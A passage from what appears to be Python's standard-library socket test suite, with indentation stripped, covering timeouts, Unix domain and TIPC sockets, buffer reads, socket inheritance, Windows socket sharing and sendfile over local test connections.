# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise TimeoutError('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = socket_helper.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = socket_helper.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = socket_helper.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except TimeoutError:
pass
except OSError as exc:
if socket_helper.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('TimeoutError not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = socket_helper.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(TimeoutError, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
self.assertIs(socket.error, OSError)
self.assertIs(socket.timeout, TimeoutError)
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
socket_helper.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(os_helper.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if os_helper.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(os_helper.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules", encoding="utf-8")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
s.setblocking(False)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = support.LOOPBACK_TIMEOUT
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(os_helper.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(os_helper.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
os_helper.unlink(os_helper.TESTFN)
def accept_conn(self):
self.serv.settimeout(support.LONG_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = os_helper.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(os_helper.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(os_helper.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
